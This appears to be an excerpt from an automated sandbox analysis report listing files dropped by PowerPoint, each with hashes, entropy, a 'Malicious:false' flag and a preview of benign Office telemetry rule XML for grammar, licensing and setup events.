                                                                                                                              SHA1:C1B538BCFBFFEB25EC1DF4E372950184D6ABF04D
                                                                                                                              SHA-256:10AEA8083F4B2136C5E5B902D2816CD81ABCE2D125E5D6A43604E725AE5261F2
                                                                                                                              SHA-512:D5FD9881C2B41204177C9F2A96469E8296A4E4AC78AEF0BEAD16BA1382E7B8C8CAB5657CE5E04B1D7811209D9DDAB3B2B54E927690882671932E9F9F9EE6288E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="222101" V="3" DC="SM" EN="Office.NaturalLanguage.Proofing.ProofingEventsRuleGrammarRuleStatusEvent" ATT="71cc1046851042108843d90e5d3ef6c1-61e5de5c-238c-4de5-95de-3b40d20ea6e5-6899" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a22tv" A="bij73 bn8xk" />.. </S>.. <C T="W" I="0" O="false" N="GrammarEventCritiqueName">.. <S T="1" F="CritiqueName" />.. </C>.. <C T="W" I="1" O="true" N="GrammarEventCultureTag">.. <S T="1" F="CultureTag" />.. </C>.. <C T="B" I="2" O="true" N="GrammarEventIsEnabled">.. <S T="1" F="IsEnabled" />.. </C>.. <C T="I32" I="3" O="true" N="GrammarEventDllVersionMajor">.. <S T="1" F="DllVersionMajor" />.. </C>.. <C T="I32" I="4" O="true" N="GrammarEventDllVersionMinor">.. <S T="1" F="DllVersionMinor" />.. </C>.. <C T="I32" I="5" O="true" N="GrammarEventDllVersionBuild">.. <S T="1" F="DllVersionBuild" />.. </C>.. <C T="I32" I="6" O="true" N="GrammarEventDllVersionRevision">.. <S T="1" F="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1754
                                                                                                                              Entropy (8bit):5.099058382662732
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dfoZMY8rHmxEdO1ftAbW/dSsj3adHwGNFXcR:cqF8yxEAmvdwGvXcR
                                                                                                                              MD5:20CACE5E68B4729AB60AB8FAE14E5A3A
                                                                                                                              SHA1:886EB258AE778237CAF547F7ED30EF46270FF4A1
                                                                                                                              SHA-256:67EB0A0915F2C4434D8E8A57308B0AC75304A3CE1BE5D70B330A0978104A193D
                                                                                                                              SHA-512:72160D844EE7F614D6BBFF615806630E9F25FB5BDEA61C1717C93549617B5CC72F050ABA4F57EF1D2507206798272B63D5B18C8D52F85C5D54D5CBD6E2D20682
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="222102" V="1" DC="SM" EN="Office.NaturalLanguage.Proofing.ProofingEventsRuleGrammarEnable" ATT="71cc1046851042108843d90e5d3ef6c1-61e5de5c-238c-4de5-95de-3b40d20ea6e5-6899" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgjm6" A="bn8xl" />.. </S>.. <C T="W" I="0" O="false" N="GrammarEventCultureTag">.. <S T="1" F="CultureTag" />.. </C>.. <C T="B" I="1" O="false" N="GrammarEventIsForegroundChecking">.. <S T="1" F="IsForegroundChecking" />.. </C>.. <C T="B" I="2" O="false" N="GrammarEventIsEnabled">.. <S T="1" F="IsEnabled" />.. </C>.. <C T="I32" I="3" O="false" N="GrammarEventDllVersionMajor">.. <S T="1" F="DllVersionMajor" />.. </C>.. <C T="I32" I="4" O="false" N="GrammarEventDllVersionMinor">.. <S T="1" F="DllVersionMinor" />.. </C>.. <C T="I32" I="5" O="false" N="GrammarEventDllVersionBuild">.. <S T="1" F="DllVersionBuild" />.. </C>.. <C T="I32" I="6" O="false" N="GrammarEventDllVersionRevision">.. <S T=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1229
                                                                                                                              Entropy (8bit):5.103797470026722
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dh4eMY8rPSFNoebdrNtxei71c7m2gcU1MdHM:cueF8LOCebdBnei7a7m2gcU1MdM
                                                                                                                              MD5:2A3655FB6191CFFA02D59D4231405454
                                                                                                                              SHA1:C2B844F56E9571DE114BEE73DF030AA19356FFAB
                                                                                                                              SHA-256:A5DCC0ACC40E8DDC458832E1ED3BE01D3BF0051940CADBBE38371938B46D3D6D
                                                                                                                              SHA-512:58DAE748C17463AB828A4BA5A390BAE848AE207B9CB7FEDCCF9BB472D330CACC288AFD2D52D4E98DCC830FC75F2108440BCA1A0A344B20E244793429500D1104
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="222200" V="5" DC="SM" EN="Office.NaturalLanguage.Proofing.ProofingEventsRuleContextualSpellerEvent" ATT="71cc1046851042108843d90e5d3ef6c1-61e5de5c-238c-4de5-95de-3b40d20ea6e5-6899" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a22tx" A="bkoh2 bn8xn" />.. </S>.. <C T="W" I="0" O="true" N="ContextualSpellerEventCultureTag">.. <S T="1" F="CultureTag" M="Ignore" />.. </C>.. <C T="W" I="1" O="true" N="ContextualSpellerEventName">.. <S T="1" F="EventName" M="Ignore" />.. </C>.. <C T="I32" I="2" O="true" N="ContextualSpellerEventScore">.. <S T="1" F="Score" M="Ignore" />.. </C>.. <C T="I32" I="3" O="true" N="ContextualSpellerEventIndexSelectedSuggestion">.. <S T="1" F="IndexSelectedSuggestion" M="Ignore" />.. </C>.. <C T="B" I="4" O="true" N="ContextualSpellerEventIsFromApplicationUndo">.. <S T="1" F="IsFromApplicationUndo" M="Ignore" />.. </C>.. <C T="U32" I="5" O="true" N="ContextualSpellerEventEndPoint">.. <S T="
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):414
                                                                                                                              Entropy (8bit):5.267547289812924
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd1C2uj4D5Mtlj87ereMfA+LwxNO2su:2dlucVMvj8irBI3
                                                                                                                              MD5:4C2721823FE7A9E3AB863CA7E9D333DE
                                                                                                                              SHA1:7239F108C63FB255C8B140144F7FF32D51DD182F
                                                                                                                              SHA-256:D586E050D5B4C3BD3E52A9E8A1153744C29CE83660F0FF59957F14E9D295308D
                                                                                                                              SHA-512:4ADA20C3FB192ABAA0042296E3ED8A4FD13A47FE4F868B15921DE18DD116EB618D4E8274EA9BBD064BF2285F7B7AAB900526D84497055528BF0D54CFB0057357
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224008" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.Client.ReportLicensingEnteringRFM" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a2y9o" />.. </S>.. <C T="I64" I="0" O="false" N="AppState">.. <S T="1" F="AppState" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):451
                                                                                                                              Entropy (8bit):5.254582578930078
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdjMC2/nXW5Mtlj87erklVBR2FMNO2su:2dOP0Mvj8irkPia
                                                                                                                              MD5:2F739B8B1DF01F02308ED6C1AB504D26
                                                                                                                              SHA1:88F3336C9C514EC78E68999744FD2905ADCC1EBA
                                                                                                                              SHA-256:BCCBCF53A7D5D3BB383A7A1A46685D29427B10FC499C7D90B616794AD4540423
                                                                                                                              SHA-512:BFB7F8A78549D5F78618C4B0A744EF6E4D4797AE4D0DB40BFBB30AFE0AC695C26E93B99ECCE3EDE69EF1441454683CCDE46242F5516C351755783151F196AF17
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224010" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.Client.HeartbeatActivationAttempted" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a46xr" />.. </S>.. <C T="FT" I="0" O="false" N="HeartbeatAttemptingActivate">.. <S T="1" F="TimeStamp100ns" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):999
                                                                                                                              Entropy (8bit):5.004221928187262
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdDC2jN4D5Mtlj87erderAfer9w6dke/Nydy0mRakX+e/iX+yp1DXgS+/nSSx6:2drjWVMvj8irorAWr9Bke1ik+eM+k12K
                                                                                                                              MD5:FB2B6BC598F12538C97FBFFC295296AA
                                                                                                                              SHA1:7FCEACE24F94DF89BE63CF51F927E534033E8EB4
                                                                                                                              SHA-256:456A0A96574834E11FC18DBC79B22569CB2818A181DC3D1A3A1FDA5367E02D2F
                                                                                                                              SHA-512:FB2628E0F9C9B68EF9D1CA7F56A1C938DC174039A6047267397EA6AF683023C6C5DE16F0430A00A3EDA2117F9A3FB354E27267692CECEE6603616E72EB88277D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224011" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.Client.ReportActivationDetails" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a46wg" />.. <UTS T="2" Id="a46vn" />.. <UTS T="3" Id="a46wh" />.. </S>.. <C T="W" I="0" O="false" N="Client">.. <S T="2" F="Client" />.. </C>.. <C T="W" I="1" O="false" N="ClientVersion">.. <S T="2" F="ClientVersion" />.. </C>.. <C T="W" I="2" O="false" N="ClientLanguage">.. <S T="2" F="ClientLanguage" />.. </C>.. <C T="I32" I="3" O="false" N="OfficeMajorVersion">.. <S T="2" F="OfficeMajorVersion" />.. </C>.. <C T="I32" I="4" O="false" N="Protocol">.. <S T="2" F="Protocol" />.. </C>.. <C T="G" I="5" O="false" N="CorrelationId">.. <S T="2" F="CorrelationId" />.. </C>.. <C T="I64" I="6" O="true" N="Result">.. <S T="3" F="HRESULT" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):427
                                                                                                                              Entropy (8bit):5.239081682219337
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdNktC2tk45MqaIajECChHperh0cwNjxPVCx3AA+/LylNOn2sby:TMHd2C2N5Mtlj87erQxlV0o6NO2su
                                                                                                                              MD5:C517CD929CEF395534B5ED8B8EB96AF5
                                                                                                                              SHA1:6B7625FACE0A22E83B48B77056A779B16CD177D1
                                                                                                                              SHA-256:2FEE7819A033E06E2331CB08137F79D81E419EFA03B272A14C2EDA00BBEB671D
                                                                                                                              SHA-512:72CE5B1EC9D4126DF51799F1F23E20268699E2AB02ED6732AB98F4171470478210685F31028A0AB9928E3C2C22887542104ACE8977A60AC626EB1AA48ACC45C1
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224012" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.Client.UserNotifiedToReboot" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a2y8m" />.. </S>.. <C T="FT" I="0" O="false" N="RebootNotificationTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):818
                                                                                                                              Entropy (8bit):5.066086618929864
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd5C2Ok5Mtlj87er7er3Nere/er5lVr6jlWKfdjlV9BfLjlEnsfe/4NOScsu:2dhOOMvj8irir3YrRr5POnrYia
                                                                                                                              MD5:6CD44453FDB074D9D5A8DC211AA3EFC9
                                                                                                                              SHA1:E598330D6555030469D70F0D6BDB40812BDD4A11
                                                                                                                              SHA-256:217B52E2E153B1AB11BD72565C181E13D012FD5D621F77F1AFF51C2AA2F2DA94
                                                                                                                              SHA-512:29AB30696E6FED9FAFF3CA38F1AF92139796BB84B3CCCF351A9667FD2400813D49E4188D7AAD2D08CA2EBC35CFD2EA7708DC903F9097A519DFA2CBC32FCCB72B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224013" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.Client.ShowSignInUI" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a2zam" />.. <UTS T="2" Id="a2zan" />.. <UTS T="3" Id="a2zcd" />.. <UTS T="4" Id="a2zao" />.. </S>.. <C T="FT" I="0" O="false" N="EnteringShowSignInUI">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="FT" I="1" O="true" N="AttemptingPassedIdentity">.. <S T="2" F="TimeStamp100ns" />.. </C>.. <C T="FT" I="2" O="true" N="ObtainedIdentity">.. <S T="4" F="TimeStamp100ns" />.. </C>.. <C T="FT" I="3" O="true" N="ActiveIdentityToNull">.. <S T="3" F="TimeStamp100ns" />.. </C>.. <T>.. <S T="1" />.. <S T="3" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1266
                                                                                                                              Entropy (8bit):4.886380355747692
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dfOyMvj8ir9rDrurPrtrwi5/S79Q1lM7:cmjtRvyzBX5/UclM7
                                                                                                                              MD5:12909807CF667874B36662ACE6058162
                                                                                                                              SHA1:4A9F8A7D758908A3EDBD7936D3F1747F8357D2BE
                                                                                                                              SHA-256:6CE0FBAD63170CF3E6B540BD9540F792C849D061EE95F0FDE1CF9C696151D990
                                                                                                                              SHA-512:54C5F4A67BE708A25385CCB66ABB2206C14984DA2CC84E3FC0478B198B6134BA02EF96725A552940A67515ABDD09F5475545AC2FCD9EBF7D1A567AD85BAE0EA4
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224059" V="0" DC="SM" EN="Office.Licensing.GetLicenseInfoForMachineKey.LicenseAccountResult" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgqus" />.. <UTS T="2" Id="bgqut" />.. <UTS T="3" Id="bgqup" />.. <UTS T="4" Id="bgquv" />.. <UTS T="5" Id="bgquw" />.. <UTS T="6" Id="bgquy" />.. <TO T="7" I="30s">.. <S T="1" />.. </TO>.. <A T="8" E="TelemetrySuspend" />.. <A T="9" E="TelemetryShutdown" />.. </S>.. <C T="U32" I="0" O="false" N="IsAccountReceived">.. <C>.. <S T="5" />.. </C>.. </C>.. <C T="U32" I="1" O="false" N="IsAccountFull">.. <C>.. <S T="6" />.. </C>.. </C>.. <C T="I64" I="2" O="true" N="FailureResult">.. <S T="3" F="HRESULT" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="FailureReasonCode">.. <S T="3" F="ErrorCode" M="Ignore" />.. </C>.. <C T="U32" I="4" O="false" N="IsInputM
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2244
                                                                                                                              Entropy (8bit):4.766413313999244
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cMOjqF0qoZTCOFH6Elr/lpXdKRyJHt8/w7:KAiBC/w7
                                                                                                                              MD5:9F1FD3252AF1F48DE401E1B7185CFD3E
                                                                                                                              SHA1:C5CB302BE8545CE6C439FE2C5E5611FF7AB72F2C
                                                                                                                              SHA-256:828EBCD7C4353FAAF1919506743622F1DC948F7FBFDC554FEB4592F951A17280
                                                                                                                              SHA-512:9500ED349994B41E988E6C1A4A679F0C9214A7C5E6ACDA9305A050C4CD91F9E614AFC8B07A8144DA4F1C26C3624060396927A385B1F0283935E4CB71E42EDDEF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224060" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.RedemptionAPI.Completion" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bc9ms" />.. <UTS T="2" Id="bf35l" />.. <UTS T="3" Id="bf346" />.. <UTS T="4" Id="bf35b" />.. <UTS T="5" Id="bf34q" />.. <UTS T="6" Id="bf34r" />.. <UTS T="7" Id="bf34s" />.. <UTS T="8" Id="bc9mt" />.. </S>.. <C T="W" I="0" O="false" N="LanguageCode">.. <S T="1" F="LanguageCode" />.. </C>.. <C T="W" I="1" O="false" N="CountryCode">.. <S T="1" F="CountryCode" />.. </C>.. <C T="B" I="2" O="true" N="ACSRequestSucceeded">.. <S T="2" F="Result.Succeeded" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="ClientTransactionId">.. <S T="3" F="ClientTransactionId" M="Ignore" />.. </C>.. <C T="U32" I="4" O="true" N="PurchaseType">.. <S T="3" F="PurchaseType" M="Ig
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1512
                                                                                                                              Entropy (8bit):4.3803114020730005
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2dtNMvj8trB8rFhrLrkdr9mFrkr3Bl9Zrj9ZvSEg9Soy3c:c8jqV87vgd5uYDBl9p999g9Z0c
                                                                                                                              MD5:02DDAB629963A6C66560DE003254240E
                                                                                                                              SHA1:5C0A1D2EA1005416DBAB352F81D09EA0E6C28CC6
                                                                                                                              SHA-256:7581C0615820F91AC29D7E141DA3F9EEBD6DD76E14C9EFD5653111C4F67C286F
                                                                                                                              SHA-512:605C49382FC39D96141B44E107518C007933FA79B47DC758BEC28C7AD110A0E8A9391F74A6EAF8E082492BB2D31BFF5C505B87777FA506D3051B3EC74B3E0A43
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224061" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.OOBE.Closed" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a7op4" />.. <UTS T="2" Id="a7oqa" />.. <UTS T="3" Id="a7oqj" />.. <UTS T="4" Id="a7opw" />.. <UTS T="5" Id="a7opz" />.. <UTS T="6" Id="bhcnc" />.. <UTS T="7" Id="a7op7" />.. <F T="8">.. <O T="AND">.. <L>.. <O T="GE">.. <L>.. <S T="1" F="Destination" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </L>.. <R>.. <O T="LE">.. <L>.. <S T="1" F="Destination" />.. </L>.. <R>.. <V V="3" T="U32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. <US T="9">.. <S T="8" />.. <S T=
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):859
                                                                                                                              Entropy (8bit):4.8742487780544455
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdPNCeuE5Mtlj8HAQierBRerSfOS+tNqNOsX/c//tpON+HNPTff44KGmydkoXt:2deuMvj8trB8rSm5t4jeFT4vGmWkorZ
                                                                                                                              MD5:F33DC1030A3C4A0AD2985212D28D51B1
                                                                                                                              SHA1:DC05F5534076109EE1E9F5A43AE5D7F2741CCF7D
                                                                                                                              SHA-256:23B603E0531BF6E422B505E301AEC4DDB4B13682F4887EBED30936BEAFC29BDD
                                                                                                                              SHA-512:5F19849A38278F300DEECF8FBA83FEAB002A54F1E8185899FEE65545C981BCA4D8B6681FEF01AA9031AA5D286E4EDC49C46379CA4A1B14938E9F5F0C51AAA99E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224062" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.OOBEWelcome.ButtonClicked" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a7op4" />.. <UTS T="2" Id="a7opz" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="1" F="Source" />.. </L>.. <R>.. <V V="0" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <G>.. <S T="3">.. <F N="ActionTarget" />.. </S>.. </G>.. <C T="U32" I="0" O="false" N="OOBEButtonPressed">.. <S T="3" F="ActionTarget" />.. </C>.. <C T="U32" I="1" O="false" N="OOBEButtonPressedCount">.. <C>.. <S T="3" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="3" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):2037
                                                                                                                              Entropy (8bit):4.964290580121227
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:24:2d22Mvj8irErZrnr/gTjkTogqwy4VuYF3wBzFwIhMKN+UFfYMF7:c29jtYNLbgTeogNutwyjfF7
                                                                                                                              MD5:5307C21B0D24976D878F79376AC263FF
                                                                                                                              SHA1:8F16434126C729FB98A1156A94B9AE9FE53A0A9A
                                                                                                                              SHA-256:85F4A22DE45C2374FB60A48D5F5C01B31CC57FE9216F08F096D80CB025B28A76
                                                                                                                              SHA-512:18DEF79BEAC9757C95D7CD53AB87394A756A342D7AD925C001F8C4320B00CA07F4AAD9E6CD548F5267875357419B30C11BDC4720D38ECD47E51E6785CE4885C5
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224068" V="0" DC="SM" EN="Office.Licensing.OfficeClientLicensing.Session.TryGetSessionToken" ATT="c1a0db0127964674a0d62fde5ab0fe62-6ec4ac45-cebc-4f80-aa83-b6b9d3a86ed7-7719" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bjzq0" />.. <UTS T="2" Id="bjzq2" />.. <UTS T="3" Id="bjzq3" />.. <UTS T="4" Id="bjzq4" />.. <A T="5" E="TelemetrySuspend" />.. <A T="6" E="TelemetryShutdown" />.. </S>.. <C T="B" I="0" O="false" N="AuthSessionNull">.. <S T="1" F="AuthSessionNull" M="Ignore" />.. </C>.. <C T="U64" I="1" O="false" N="SigningCertLength">.. <S T="1" F="SigningCertLength" M="Ignore" />.. </C>.. <C T="B" I="2" O="false" N="ChosenEntitlementNull">.. <S T="1" F="ChosenEntitlementNull" M="Ignore" />.. </C>.. <C T="B" I="3" O="false" N="OlsIdentityNull">.. <S T="1" F="OlsIdentityNull" M="Ignore" />.. </C>.. <C T="B" I="4" O="false" N="ActiveIdentityNull">.. <S T="1" F="ActiveIdentityNull" M="Ignore" />.. </C
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):419
                                                                                                                              Entropy (8bit):4.271508382564369
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdNberPO+u/qNOPX/c//spONwspSZNOjsu:2dQrPNuygNo
                                                                                                                              MD5:CA6D18BE1B6CB81896D5C642C0FEB2A8
                                                                                                                              SHA1:EAB023C0FB0FDC78EDD135713DD748D1BD3D54CD
                                                                                                                              SHA-256:85F0D5B3888C115DDFDFF5509748B4EC508A54236B295BD5103B5C1F9EB1B50F
                                                                                                                              SHA-512:D44DE97A2201758CEE068D0D272692D273ECBC3F656587549DCD2A86AE16162868B2D158013AF633A63F0744B236DFC93FA048E584CF9D0EF4D321B752E05142
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224072" V="0" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="ba9f8" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="OOBEMode" />.. </L>.. <R>.. <V V="OEMTA" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="W" I="0" O="true">.. <S T="2" F="OOBEMode" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):482
                                                                                                                              Entropy (8bit):4.279287793372496
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd2yberJHferT+tNqNOGmfX/c//+pONU5oVrzNOAHNUlu:2d2TrJ2rit4DmvI97
                                                                                                                              MD5:08141D4106FCB910715B54F07E45377E
                                                                                                                              SHA1:D049C9C519286573331EB62A5FC7C28DAAF3FFD6
                                                                                                                              SHA-256:637E5BE8EC0EA41FCBC695C4C10E9412AA031F7EADD397F8EB1499A7FA3744DA
                                                                                                                              SHA-512:2B50437C78B59764C6A856D66848224766A07D6722B4EC172D7E7C96C93F1638B5ECD218D70FF0DEF861FC0C971A27EC0C2219DA48A575749C4559DE9818922D
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224073" V="1" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="bnpxq" />.. <UTS T="2" Id="a7oqj" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="ActionTarget" />.. </L>.. <R>.. <V V="7" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <C T="B" I="0" O="false">.. <V V="true" T="B" />.. </C>.. <T>.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):482
                                                                                                                              Entropy (8bit):4.280853950015988
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdgberJHferT+tNqNOGmfX/c//apONU5oVrzNOAHNUlu:2dJrJ2rit4Dmvk97
                                                                                                                              MD5:3892DDB7F37107D5C79CCDB071F909B5
                                                                                                                              SHA1:020BDF2B0C626D7264F956B7558D1EBC61BD4335
                                                                                                                              SHA-256:233F71AEF6E49C6899F77A9951913356801180905B31609497D8A6A538B25D1E
                                                                                                                              SHA-512:0CA0E39DE8B73D144C58ECA90A70CD8230766C27249D8B196900E9984A64C1D58E6F68DBEDFBE32CE7F7718C46A63C4B7AC20508C83AA908AEEDB0A177DD6B23
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="224074" V="1" DC="SM" T="Subrule" xmlns="">.. <S>.. <UTS T="1" Id="bnpxq" />.. <UTS T="2" Id="a7oqj" />.. <F T="3">.. <O T="EQ">.. <L>.. <S T="2" F="ActionTarget" />.. </L>.. <R>.. <V V="3" T="U32" />.. </R>.. </O>.. </F>.. </S>.. <C T="B" I="0" O="false">.. <V V="true" T="B" />.. </C>.. <T>.. <S T="3" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1160
